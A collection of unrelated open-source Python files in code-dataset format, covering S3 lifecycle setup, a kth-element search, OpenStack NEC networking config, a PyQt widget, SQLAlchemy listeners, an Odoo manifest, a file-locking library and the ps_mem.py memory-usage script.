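def lifecycle_roundtrip():
    conn = boto.s3.connect_to_region("us-west-1")
    bucket = conn.create_bucket("example-bucket")
    lifecycle = Lifecycle()
    lifecycle.add_rule("myid", "logs/", "Enabled", 30)  # expire logs/ objects after 30 days
    bucket.configure_lifecycle(lifecycle)
    return bucket.get_lifecycle_config()[0].id

assert lifecycle_roundtrip() == "myid"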
bourneagain/pythonBytes
quickSort.py
1
1075
def kthlargest(arr1, arr2, k): if len(arr1) == 0: return arr2[k] elif len(arr2) == 0: return arr1[k] mida1 = len(arr1)/2 mida2 = len(arr2)/2 if mida1+mida2<k: if arr1[mida1]>arr2[mida2]: return kthlargest(arr1, arr2[mida2+1:], k-mida2-1) else: return kthlargest(arr1[mida1+1:], arr2, k-mida1-1) else: if arr1[mida1]>arr2[mida2]: return kthlargest(arr1[:mida1], arr2, k) else: return kthlargest(arr1, arr2[:mida2], k) # def quickSort(arr): # less = [] # pivotList = [] # more = [] # if len(arr) <= 1: # return arr # else: # pivot = arr[0] # for i in arr: # if i < pivot: # less.append(i) # elif i > pivot: # more.append(i) # else: # pivotList.append(i) # less = quickSort(less) # more = quickSort(more) # return less + pivotList + more # a = [4, 65, 2, -31, 0, 99, 83, 782, 1] # a = quickSort(a)
mit
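An illustrative call for the function above; despite its name, tracing the recursion shows it returns the element at 0-based index k of the two inputs merged in ascending order, and both inputs are assumed to be pre-sorted.

print(kthlargest([1, 3, 5, 7], [2, 4, 6, 8], 3))  # -> 4, i.e. index 3 of [1, 2, 3, 4, 5, 6, 7, 8]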
stackforge/networking-nec
networking_nec/nwa/common/config.py
2
4009
# Copyright 2015-2016 NEC Corporation. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from neutron.agent.common import config from oslo_config import cfg from networking_nec._i18n import _ agent_opts = [ cfg.IntOpt('polling_interval', default=2, help=_("The number of seconds the agent will wait between " "polling for local device changes.")), ] cfg.CONF.register_opts(agent_opts, "AGENT") config.register_agent_state_opts_helper(cfg.CONF) # nwa.ini NWA_opts = [ cfg.StrOpt('server_url', help=_("URL for NWA REST API.")), cfg.StrOpt('access_key_id', help=_("Access ID for NWA REST API.")), cfg.StrOpt('secret_access_key', help=_("Secret key for NWA REST API.")), cfg.StrOpt('resource_group_name', help=_( "Resouce Group Name specified at creating tenant NW.")), cfg.StrOpt('region_name', help=_("RegionName for DC."), default='RegionOne'), cfg.IntOpt('scenario_polling_first_timer', default=2, help=_("Timer value for the first scenario status polling.")), cfg.IntOpt('scenario_polling_timer', default=10, help=_("Timer value for polling scenario status.")), cfg.IntOpt('scenario_polling_count', default=6, help=_("Count value for polling scenario status.")), cfg.BoolOpt('use_necnwa_router', help=_("Using necnwa_router instead of the l3-router"), default=True), cfg.BoolOpt('use_neutron_vlan_id', help=_("Using vlan id of neutron instead of NWA"), default=False), cfg.StrOpt('ironic_az_prefix', help=_("The prefix name of device_owner used in ironic"), default='BM_'), cfg.BoolOpt('use_setting_fw_policy', default=False, help=_('Using setting_fw_policy as default')), cfg.StrOpt('resource_group_file', help=_("JSON file which defines relations between " "physical network of OpenStack and NWA.")), cfg.StrOpt('resource_group', deprecated_for_removal=True, deprecated_reason='In favor of resource_group_file option.', help=_(""" Relations between physical network of OpenStack and NWA. ex) [ { "physical_network": "physnet1", "ResourceGroupName":"Core/Hypervisor/HV-RG01" }, { ... }, ]""")), cfg.StrOpt('lbaas_driver', help=_("LBaaS Driver Name")), cfg.StrOpt('fwaas_driver', help=_("Firewall Driver Name")), ] Scenario_opts = [ cfg.StrOpt('CreateTenantFW', help=_("Scenario ID for the scenario CreateTenantFW.")), cfg.StrOpt('CreateTenantNW', help=_("Scenario ID for the scenario CreateTenantNW.")), cfg.StrOpt('CreateVLAN', help=_("Scenario ID for the scenario CreateVLAN.")), cfg.StrOpt('CreateGeneralDev', help=_( "Scenario ID for the scenario CreateGeneralDev.")), cfg.StrOpt('UpdateTenantFW', help=_("Scenario ID for the scenario UpdateTenantFW.")), cfg.StrOpt('SettingNAT', help=_("Scenario ID for the scenario SettingNAT.")), ] cfg.CONF.register_opts(NWA_opts, "NWA") cfg.CONF.register_opts(Scenario_opts, "Scenario")
apache-2.0
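Once this module is imported, the registered groups become readable through oslo.config; a hypothetical sketch in which the config-file path and its contents are assumptions.

from oslo_config import cfg
from networking_nec.nwa.common import config  # noqa: importing registers the NWA/Scenario groups

cfg.CONF(["--config-file", "/etc/neutron/plugins/nec/nwa.ini"])
print(cfg.CONF.NWA.server_url, cfg.CONF.NWA.scenario_polling_timer)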
ergoregion/Rota-Program
Rota_System/UI/People/widget_population.py
1
1876
__author__ = 'Neil Butcher' from PyQt4 import QtCore, QtGui from model_population import PopulationModel from Rota_System.UI.widget_addDel_list import AddDelListWidget from widget_person import PersonWidget class PopulationWidget(QtGui.QWidget): commandIssued = QtCore.pyqtSignal(QtGui.QUndoCommand) criticalCommandIssued = QtCore.pyqtSignal() def __init__(self, parent=None): QtGui.QWidget.__init__(self, parent) self.layout = QtGui.QHBoxLayout(self) self.list_widget = AddDelListWidget(self) self.layout.addWidget(self.list_widget) self.person_widget = PersonWidget(self) self.layout.addWidget(self.person_widget) self.list_widget.objectSelected.connect(self.person_widget.person) self.person_widget.commandIssued.connect(self.emitCommand) self.person_widget.criticalCommandIssued.connect(self.emitCriticalCommand) def institution(self, institution): model = PopulationModel(institution) self.setModel(model) return model def setModel(self, model): self.list_widget.setModel(model) model.commandIssued.connect(self.emitCommand) model.criticalCommandIssued.connect(self.emitCriticalCommand) @QtCore.pyqtSlot(QtGui.QUndoCommand) def emitCommand(self, command): self.commandIssued.emit(command) @QtCore.pyqtSlot() def emitCriticalCommand(self): self.criticalCommandIssued.emit() from Rota_System.UI.model_undo import MasterUndoModel import sys from Rota_System.Institution import Institution def main(): i = Institution(None) model = PopulationModel(i) m = MasterUndoModel() app = QtGui.QApplication(sys.argv) w = PopulationWidget(None) m.add_command_contributer(w) w.setModel(model) w.show() sys.exit(app.exec_()) if __name__ == '__main__': main()
mit
williamfeng323/py-web
flask/lib/python3.6/site-packages/sqlalchemy_utils/listeners.py
2
7485
import sqlalchemy as sa from .exceptions import ImproperlyConfigured def coercion_listener(mapper, class_): """ Auto assigns coercing listener for all class properties which are of coerce capable type. """ for prop in mapper.iterate_properties: try: listener = prop.columns[0].type.coercion_listener except AttributeError: continue sa.event.listen( getattr(class_, prop.key), 'set', listener, retval=True ) def instant_defaults_listener(target, args, kwargs): for key, column in sa.inspect(target.__class__).columns.items(): if hasattr(column, 'default') and column.default is not None: if callable(column.default.arg): setattr(target, key, column.default.arg(target)) else: setattr(target, key, column.default.arg) def force_auto_coercion(mapper=None): """ Function that assigns automatic data type coercion for all classes which are of type of given mapper. The coercion is applied to all coercion capable properties. By default coercion is applied to all SQLAlchemy mappers. Before initializing your models you need to call force_auto_coercion. :: from sqlalchemy_utils import force_auto_coercion force_auto_coercion() Then define your models the usual way:: class Document(Base): __tablename__ = 'document' id = sa.Column(sa.Integer, autoincrement=True) name = sa.Column(sa.Unicode(50)) background_color = sa.Column(ColorType) Now scalar values for coercion capable data types will convert to appropriate value objects:: document = Document() document.background_color = 'F5F5F5' document.background_color # Color object session.commit() A useful side-effect of this is that additional validation of data will be done on the moment it is being assigned to model objects. For example without auto coerction set, an invalid :class:`sqlalchemy_utils.types.IPAddressType` (eg. ``10.0.0 255.255``) would get through without an exception being raised. The database wouldn't notice this (as most databases don't have a native type for an IP address, so they're usually just stored as a string), and the ``ipaddress/ipaddr`` package uses a string field as well. :param mapper: The mapper which the automatic data type coercion should be applied to """ if mapper is None: mapper = sa.orm.mapper sa.event.listen(mapper, 'mapper_configured', coercion_listener) def force_instant_defaults(mapper=None): """ Function that assigns object column defaults on object initialization time. By default calling this function applies instant defaults to all your models. Setting up instant defaults:: from sqlalchemy_utils import force_instant_defaults force_instant_defaults() Example usage:: class Document(Base): __tablename__ = 'document' id = sa.Column(sa.Integer, autoincrement=True) name = sa.Column(sa.Unicode(50)) created_at = sa.Column(sa.DateTime, default=datetime.now) document = Document() document.created_at # datetime object :param mapper: The mapper which the automatic instant defaults forcing should be applied to """ if mapper is None: mapper = sa.orm.mapper sa.event.listen(mapper, 'init', instant_defaults_listener) def auto_delete_orphans(attr): """ Delete orphans for given SQLAlchemy model attribute. This function can be used for deleting many-to-many associated orphans easily. For more information see https://bitbucket.org/zzzeek/sqlalchemy/wiki/UsageRecipes/ManyToManyOrphan. 
Consider the following model definition: :: from sqlalchemy.ext.associationproxy import association_proxy from sqlalchemy import * from sqlalchemy.orm import * from sqlalchemy.ext.declarative import declarative_base from sqlalchemy import event Base = declarative_base() tagging = Table( 'tagging', Base.metadata, Column( 'tag_id', Integer, ForeignKey('tag.id', ondelete='CASCADE'), primary_key=True ), Column( 'entry_id', Integer, ForeignKey('entry.id', ondelete='CASCADE'), primary_key=True ) ) class Tag(Base): __tablename__ = 'tag' id = Column(Integer, primary_key=True) name = Column(String(100), unique=True, nullable=False) def __init__(self, name=None): self.name = name class Entry(Base): __tablename__ = 'entry' id = Column(Integer, primary_key=True) tags = relationship( 'Tag', secondary=tagging, backref='entries' ) Now lets say we want to delete the tags if all their parents get deleted ( all Entry objects get deleted). This can be achieved as follows: :: from sqlalchemy_utils import auto_delete_orphans auto_delete_orphans(Entry.tags) After we've set up this listener we can see it in action. :: e = create_engine('sqlite://') Base.metadata.create_all(e) s = Session(e) r1 = Entry() r2 = Entry() r3 = Entry() t1, t2, t3, t4 = Tag('t1'), Tag('t2'), Tag('t3'), Tag('t4') r1.tags.extend([t1, t2]) r2.tags.extend([t2, t3]) r3.tags.extend([t4]) s.add_all([r1, r2, r3]) assert s.query(Tag).count() == 4 r2.tags.remove(t2) assert s.query(Tag).count() == 4 r1.tags.remove(t2) assert s.query(Tag).count() == 3 r1.tags.remove(t1) assert s.query(Tag).count() == 2 .. versionadded: 0.26.4 :param attr: Association relationship attribute to auto delete orphans from """ parent_class = attr.parent.class_ target_class = attr.property.mapper.class_ backref = attr.property.backref if not backref: raise ImproperlyConfigured( 'The relationship argument given for auto_delete_orphans needs to ' 'have a backref relationship set.' ) if isinstance(backref, tuple): backref = backref[0] @sa.event.listens_for(sa.orm.Session, 'after_flush') def delete_orphan_listener(session, ctx): # Look through Session state to see if we want to emit a DELETE for # orphans orphans_found = ( any( isinstance(obj, parent_class) and sa.orm.attributes.get_history(obj, attr.key).deleted for obj in session.dirty ) or any( isinstance(obj, parent_class) for obj in session.deleted ) ) if orphans_found: # Emit a DELETE for all orphans ( session.query(target_class) .filter( ~getattr(target_class, backref).any() ) .delete(synchronize_session=False) )
mit
BT-astauder/odoo
addons/web_analytics/__openerp__.py
305
1432
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Google Analytics', 'version': '1.0', 'category': 'Tools', 'complexity': "easy", 'description': """ Google Analytics. ================= Collects web application usage with Google Analytics. """, 'author': 'OpenERP SA', 'website': 'https://www.odoo.com/page/website-builder', 'depends': ['web'], 'data': [ 'views/web_analytics.xml', ], 'installable': True, 'active': False, }
agpl-3.0
brianwoo/django-tutorial
ENV/lib/python2.7/site-packages/pip/_vendor/lockfile/__init__.py
475
9162
""" lockfile.py - Platform-independent advisory file locks. Requires Python 2.5 unless you apply 2.4.diff Locking is done on a per-thread basis instead of a per-process basis. Usage: >>> lock = LockFile('somefile') >>> try: ... lock.acquire() ... except AlreadyLocked: ... print 'somefile', 'is locked already.' ... except LockFailed: ... print 'somefile', 'can\\'t be locked.' ... else: ... print 'got lock' got lock >>> print lock.is_locked() True >>> lock.release() >>> lock = LockFile('somefile') >>> print lock.is_locked() False >>> with lock: ... print lock.is_locked() True >>> print lock.is_locked() False >>> lock = LockFile('somefile') >>> # It is okay to lock twice from the same thread... >>> with lock: ... lock.acquire() ... >>> # Though no counter is kept, so you can't unlock multiple times... >>> print lock.is_locked() False Exceptions: Error - base class for other exceptions LockError - base class for all locking exceptions AlreadyLocked - Another thread or process already holds the lock LockFailed - Lock failed for some other reason UnlockError - base class for all unlocking exceptions AlreadyUnlocked - File was not locked. NotMyLock - File was locked but not by the current thread/process """ from __future__ import absolute_import import sys import socket import os import threading import time import urllib import warnings import functools # Work with PEP8 and non-PEP8 versions of threading module. if not hasattr(threading, "current_thread"): threading.current_thread = threading.currentThread if not hasattr(threading.Thread, "get_name"): threading.Thread.get_name = threading.Thread.getName __all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked', 'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock', 'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile', 'LockBase', 'locked'] class Error(Exception): """ Base class for other exceptions. >>> try: ... raise Error ... except Exception: ... pass """ pass class LockError(Error): """ Base class for error arising from attempts to acquire the lock. >>> try: ... raise LockError ... except Error: ... pass """ pass class LockTimeout(LockError): """Raised when lock creation fails within a user-defined period of time. >>> try: ... raise LockTimeout ... except LockError: ... pass """ pass class AlreadyLocked(LockError): """Some other thread/process is locking the file. >>> try: ... raise AlreadyLocked ... except LockError: ... pass """ pass class LockFailed(LockError): """Lock file creation failed for some other reason. >>> try: ... raise LockFailed ... except LockError: ... pass """ pass class UnlockError(Error): """ Base class for errors arising from attempts to release the lock. >>> try: ... raise UnlockError ... except Error: ... pass """ pass class NotLocked(UnlockError): """Raised when an attempt is made to unlock an unlocked file. >>> try: ... raise NotLocked ... except UnlockError: ... pass """ pass class NotMyLock(UnlockError): """Raised when an attempt is made to unlock a file someone else locked. >>> try: ... raise NotMyLock ... except UnlockError: ... pass """ pass class LockBase: """Base class for platform-specific lock classes.""" def __init__(self, path, threaded=True, timeout=None): """ >>> lock = LockBase('somefile') >>> lock = LockBase('somefile', threaded=False) """ self.path = path self.lock_file = os.path.abspath(path) + ".lock" self.hostname = socket.gethostname() self.pid = os.getpid() if threaded: t = threading.current_thread() # Thread objects in Python 2.4 and earlier do not have ident # attrs. Worm around that. 
ident = getattr(t, "ident", hash(t)) self.tname = "-%x" % (ident & 0xffffffff) else: self.tname = "" dirname = os.path.dirname(self.lock_file) # unique name is mostly about the current process, but must # also contain the path -- otherwise, two adjacent locked # files conflict (one file gets locked, creating lock-file and # unique file, the other one gets locked, creating lock-file # and overwriting the already existing lock-file, then one # gets unlocked, deleting both lock-file and unique file, # finally the last lock errors out upon releasing. self.unique_name = os.path.join(dirname, "%s%s.%s%s" % (self.hostname, self.tname, self.pid, hash(self.path))) self.timeout = timeout def acquire(self, timeout=None): """ Acquire the lock. * If timeout is omitted (or None), wait forever trying to lock the file. * If timeout > 0, try to acquire the lock for that many seconds. If the lock period expires and the file is still locked, raise LockTimeout. * If timeout <= 0, raise AlreadyLocked immediately if the file is already locked. """ raise NotImplemented("implement in subclass") def release(self): """ Release the lock. If the file is not locked, raise NotLocked. """ raise NotImplemented("implement in subclass") def is_locked(self): """ Tell whether or not the file is locked. """ raise NotImplemented("implement in subclass") def i_am_locking(self): """ Return True if this object is locking the file. """ raise NotImplemented("implement in subclass") def break_lock(self): """ Remove a lock. Useful if a locking thread failed to unlock. """ raise NotImplemented("implement in subclass") def __enter__(self): """ Context manager support. """ self.acquire() return self def __exit__(self, *_exc): """ Context manager support. """ self.release() def __repr__(self): return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name, self.path) def _fl_helper(cls, mod, *args, **kwds): warnings.warn("Import from %s module instead of lockfile package" % mod, DeprecationWarning, stacklevel=2) # This is a bit funky, but it's only for awhile. The way the unit tests # are constructed this function winds up as an unbound method, so it # actually takes three args, not two. We want to toss out self. if not isinstance(args[0], str): # We are testing, avoid the first arg args = args[1:] if len(args) == 1 and not kwds: kwds["threaded"] = True return cls(*args, **kwds) def LinkFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import LinkLockFile from the lockfile.linklockfile module. """ from . import linklockfile return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile", *args, **kwds) def MkdirFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import MkdirLockFile from the lockfile.mkdirlockfile module. """ from . import mkdirlockfile return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile", *args, **kwds) def SQLiteFileLock(*args, **kwds): """Factory function provided for backwards compatibility. Do not use in new code. Instead, import SQLiteLockFile from the lockfile.mkdirlockfile module. """ from . import sqlitelockfile return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile", *args, **kwds) def locked(path, timeout=None): """Decorator which enables locks for decorated function. Arguments: - path: path for lockfile. - timeout (optional): Timeout for acquiring lock. Usage: @locked('/var/run/myname', timeout=0) def myname(...): ... 
""" def decor(func): @functools.wraps(func) def wrapper(*args, **kwargs): lock = FileLock(path, timeout=timeout) lock.acquire() try: return func(*args, **kwargs) finally: lock.release() return wrapper return decor if hasattr(os, "link"): from . import linklockfile as _llf LockFile = _llf.LinkLockFile else: from . import mkdirlockfile as _mlf LockFile = _mlf.MkdirLockFile FileLock = LockFile
gpl-3.0
Boedaxbayah-vpn/boedaxbayah
ps_mem.py
3
17568
#!/usr/bin/env python # Try to determine how much RAM is currently being used per program. # Note per _program_, not per process. So for example this script # will report RAM used by all httpd process together. In detail it reports: # sum(private RAM for program processes) + sum(Shared RAM for program processes) # The shared RAM is problematic to calculate, and this script automatically # selects the most accurate method available for your kernel. # Licence: LGPLv2 # Author: [email protected] # Source: http://www.pixelbeat.org/scripts/ps_mem.py # V1.0 06 Jul 2005 Initial release # V1.1 11 Aug 2006 root permission required for accuracy # V1.2 08 Nov 2006 Add total to output # Use KiB,MiB,... for units rather than K,M,... # V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for # 2.6 kernels up to and including 2.6.9. # There it represented the total file backed extent # V1.4 23 Nov 2006 Remove total from output as it's meaningless # (the shared values overlap with other programs). # Display the shared column. This extra info is # useful, especially as it overlaps between programs. # V1.5 26 Mar 2007 Remove redundant recursion from human() # V1.6 05 Jun 2007 Also report number of processes with a given name. # Patch from [email protected] # V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which # fixes some over-estimation and allows totalling. # Enumerate the PIDs directly rather than using ps, # which fixes the possible race between reading # RSS with ps, and shared memory with this program. # Also we can show non truncated command names. # V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps # as otherwise could match libraries causing a crash. # Patch from [email protected] # V1.9 20 Feb 2008 Fix invalid values reported when PSS is available. # Reported by Andrey Borzenkov <[email protected]> # V3.3 24 Jun 2014 # http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py # Notes: # # All interpreted programs where the interpreter is started # by the shell or with env, will be merged to the interpreter # (as that's what's given to exec). For e.g. all python programs # starting with "#!/usr/bin/env python" will be grouped under python. # You can change this by using the full command line but that will # have the undesirable affect of splitting up programs started with # differing parameters (for e.g. mingetty tty[1-6]). # # For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels # (rmap vm without smaps) it can not be accurately determined how many pages # are shared between processes in general or within a program in our case: # http://lkml.org/lkml/2005/7/6/250 # A warning is printed if overestimation is possible. # In addition for 2.6 kernels up to 2.6.9 inclusive, the shared # value in /proc/$pid/statm is the total file-backed extent of a process. # We ignore that, introducing more overestimation, again printing a warning. # Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows # us to calculate a more accurate value for the total RAM used by programs. # # Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming # they're the only programs that have the same /proc/$PID/smaps file for # each instance. This will fail if there are multiple real instances of a # program that then use CLONE_VM without CLONE_THREAD, or if a clone changes # its memory map while we're checksumming each /proc/$PID/smaps. # # I don't take account of memory allocated for a program # by other programs. For e.g. 
memory used in the X server for # a program could be determined, but is not. # # FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/ # FreeBSD 8.0 supports up to a level of Linux 2.6.16 import getopt import time import errno import os import sys try: # md5 module is deprecated on python 2.6 # so try the newer hashlib first import hashlib md5_new = hashlib.md5 except ImportError: import md5 md5_new = md5.new # The following exits cleanly on Ctrl-C or EPIPE # while treating other exceptions as before. def std_exceptions(etype, value, tb): sys.excepthook = sys.__excepthook__ if issubclass(etype, KeyboardInterrupt): pass elif issubclass(etype, IOError) and value.errno == errno.EPIPE: pass else: sys.__excepthook__(etype, value, tb) sys.excepthook = std_exceptions # # Define some global variables # PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB our_pid = os.getpid() have_pss = 0 class Proc: def __init__(self): uname = os.uname() if uname[0] == "FreeBSD": self.proc = '/compat/linux/proc' else: self.proc = '/proc' def path(self, *args): return os.path.join(self.proc, *(str(a) for a in args)) def open(self, *args): try: return open(self.path(*args)) except (IOError, OSError): val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise proc = Proc() # # Functions # def parse_options(): try: long_options = ['split-args', 'help', 'total'] opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options) except getopt.GetoptError: sys.stderr.write(help()) sys.exit(3) # ps_mem.py options split_args = False pids_to_show = None watch = None only_total = False for o, a in opts: if o in ('-s', '--split-args'): split_args = True if o in ('-t', '--total'): only_total = True if o in ('-h', '--help'): sys.stdout.write(help()) sys.exit(0) if o in ('-p',): try: pids_to_show = [int(x) for x in a.split(',')] except: sys.stderr.write(help()) sys.exit(3) if o in ('-w',): try: watch = int(a) except: sys.stderr.write(help()) sys.exit(3) return (split_args, pids_to_show, watch, only_total) def help(): help_msg = 'ps_mem.py - Show process memory usage\n'\ '\n'\ '-h Show this help\n'\ '-w <N> Measure and show process memory every N seconds\n'\ '-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \ '-s, --split-args Show and separate by, all command line arguments\n' \ '-t, --total Show only the total value\n' return help_msg #(major,minor,release) def kernel_ver(): kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3] last = len(kv) if last == 2: kv.append('0') last -= 1 while last > 0: for char in "-_": kv[last] = kv[last].split(char)[0] try: int(kv[last]) except: kv[last] = 0 last -= 1 return (int(kv[0]), int(kv[1]), int(kv[2])) #return Private,Shared #Note shared is always a subset of rss (trs is not always) def getMemStats(pid): global have_pss mem_id = pid #unique Private_lines = [] Shared_lines = [] Pss_lines = [] Rss = (int(proc.open(pid, 'statm').readline().split()[1]) * PAGESIZE) if os.path.exists(proc.path(pid, 'smaps')): #stat digester = md5_new() for line in proc.open(pid, 'smaps').readlines(): #open # Note we checksum smaps as maps is usually but # not always different for separate processes. 
digester.update(line.encode('latin1')) if line.startswith("Shared"): Shared_lines.append(line) elif line.startswith("Private"): Private_lines.append(line) elif line.startswith("Pss"): have_pss = 1 Pss_lines.append(line) mem_id = digester.hexdigest() Shared = sum([int(line.split()[1]) for line in Shared_lines]) Private = sum([int(line.split()[1]) for line in Private_lines]) #Note Shared + Private = Rss above #The Rss in smaps includes video card mem etc. if have_pss: pss_adjust = 0.5 # add 0.5KiB as this avg error due to trunctation Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines]) Shared = Pss - Private elif (2,6,1) <= kernel_ver() <= (2,6,9): Shared = 0 #lots of overestimation, but what can we do? Private = Rss else: Shared = int(proc.open(pid, 'statm').readline().split()[2]) Shared *= PAGESIZE Private = Rss - Shared return (Private, Shared, mem_id) def getCmdName(pid, split_args): cmdline = proc.open(pid, 'cmdline').read().split("\0") if cmdline[-1] == '' and len(cmdline) > 1: cmdline = cmdline[:-1] path = proc.path(pid, 'exe') try: path = os.readlink(path) # Some symlink targets were seen to contain NULs on RHEL 5 at least # https://github.com/pixelb/scripts/pull/10, so take string up to NUL path = path.split('\0')[0] except OSError: val = sys.exc_info()[1] if (val.errno == errno.ENOENT or # either kernel thread or process gone val.errno == errno.EPERM): raise LookupError raise if split_args: return " ".join(cmdline) if path.endswith(" (deleted)"): path = path[:-10] if os.path.exists(path): path += " [updated]" else: #The path could be have prelink stuff so try cmdline #which might have the full path present. This helped for: #/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted) if os.path.exists(cmdline[0]): path = cmdline[0] + " [updated]" else: path += " [deleted]" exe = os.path.basename(path) cmd = proc.open(pid, 'status').readline()[6:-1] if exe.startswith(cmd): cmd = exe #show non truncated version #Note because we show the non truncated name #one can have separated programs as follows: #584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash) # 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin return cmd #The following matches "du -h" output #see also human.py def human(num, power="Ki"): powers = ["Ki", "Mi", "Gi", "Ti"] while num >= 1000: #4 digits num /= 1024.0 power = powers[powers.index(power)+1] return "%.1f %s" % (num, power) def cmd_with_count(cmd, count): if count > 1: return "%s (%u)" % (cmd, count) else: return cmd #Warn of possible inaccuracies #2 = accurate & can total #1 = accurate only considering each process in isolation #0 = some shared mem not reported #-1= all shared mem not reported def shared_val_accuracy(): """http://wiki.apache.org/spamassassin/TopSharedMemoryBug""" kv = kernel_ver() if kv[:2] == (2,4): if proc.open('meminfo').read().find("Inact_") == -1: return 1 return 0 elif kv[:2] == (2,6): pid = os.getpid() if os.path.exists(proc.path(pid, 'smaps')): if proc.open(pid, 'smaps').read().find("Pss:")!=-1: return 2 else: return 1 if (2,6,1) <= kv <= (2,6,9): return -1 return 0 elif kv[0] > 2: return 2 else: return 1 def show_shared_val_accuracy( possible_inacc, only_total=False ): level = ("Warning","Error")[only_total] if possible_inacc == -1: sys.stderr.write( "%s: Shared memory is not reported by this system.\n" % level ) sys.stderr.write( "Values reported will be too large, and totals are not reported\n" ) elif possible_inacc == 0: sys.stderr.write( "%s: Shared memory is not reported accurately by this system.\n" % 
level ) sys.stderr.write( "Values reported could be too large, and totals are not reported\n" ) elif possible_inacc == 1: sys.stderr.write( "%s: Shared memory is slightly over-estimated by this system\n" "for each program, so totals are not reported.\n" % level ) sys.stderr.close() if only_total and possible_inacc != 2: sys.exit(1) def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ): cmds = {} shareds = {} mem_ids = {} count = {} for pid in os.listdir(proc.path('')): if not pid.isdigit(): continue pid = int(pid) # Some filters if only_self and pid != our_pid: continue if pid == our_pid and not include_self: continue if pids_to_show is not None and pid not in pids_to_show: continue try: cmd = getCmdName(pid, split_args) except LookupError: #operation not permitted #kernel threads don't have exe links or #process gone continue try: private, shared, mem_id = getMemStats(pid) except RuntimeError: continue #process gone if shareds.get(cmd): if have_pss: #add shared portion of PSS together shareds[cmd] += shared elif shareds[cmd] < shared: #just take largest shared val shareds[cmd] = shared else: shareds[cmd] = shared cmds[cmd] = cmds.setdefault(cmd, 0) + private if cmd in count: count[cmd] += 1 else: count[cmd] = 1 mem_ids.setdefault(cmd, {}).update({mem_id:None}) #Add shared mem for each program total = 0 for cmd in cmds: cmd_count = count[cmd] if len(mem_ids[cmd]) == 1 and cmd_count > 1: # Assume this program is using CLONE_VM without CLONE_THREAD # so only account for one of the processes cmds[cmd] /= cmd_count if have_pss: shareds[cmd] /= cmd_count cmds[cmd] = cmds[cmd] + shareds[cmd] total += cmds[cmd] #valid if PSS available sorted_cmds = sorted(cmds.items(), key=lambda x:x[1]) sorted_cmds = [x for x in sorted_cmds if x[1]] return sorted_cmds, shareds, count, total def print_header(): sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n") def print_memory_usage(sorted_cmds, shareds, count, total): for cmd in sorted_cmds: sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" % (human(cmd[1]-shareds[cmd[0]]), human(shareds[cmd[0]]), human(cmd[1]), cmd_with_count(cmd[0], count[cmd[0]]))) if have_pss: sys.stdout.write("%s\n%s%8sB\n%s\n" % ("-" * 33, " " * 24, human(total), "=" * 33)) def verify_environment(): if os.geteuid() != 0: sys.stderr.write("Sorry, root permission required.\n") if __name__ == '__main__': sys.stderr.close() sys.exit(1) try: kv = kernel_ver() except (IOError, OSError): val = sys.exc_info()[1] if val.errno == errno.ENOENT: sys.stderr.write( "Couldn't access " + proc.path('') + "\n" "Only GNU/Linux and FreeBSD (with linprocfs) are supported\n") sys.exit(2) else: raise if __name__ == '__main__': verify_environment() split_args, pids_to_show, watch, only_total = parse_options() if not only_total: print_header() if watch is not None: try: sorted_cmds = True while sorted_cmds: sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) time.sleep(watch) else: sys.stdout.write('Process does not exist anymore.\n') except KeyboardInterrupt: pass else: # This is the default behavior sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args ) if only_total and have_pss: sys.stdout.write(human(total).replace(' ','')+'B\n') elif not only_total: print_memory_usage(sorted_cmds, shareds, count, total) # We must close explicitly, so that any EPIPE exception # 
is handled by our excepthook, rather than the default # one which is reenabled after this script finishes. sys.stdout.close() vm_accuracy = shared_val_accuracy() show_shared_val_accuracy( vm_accuracy, only_total )
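
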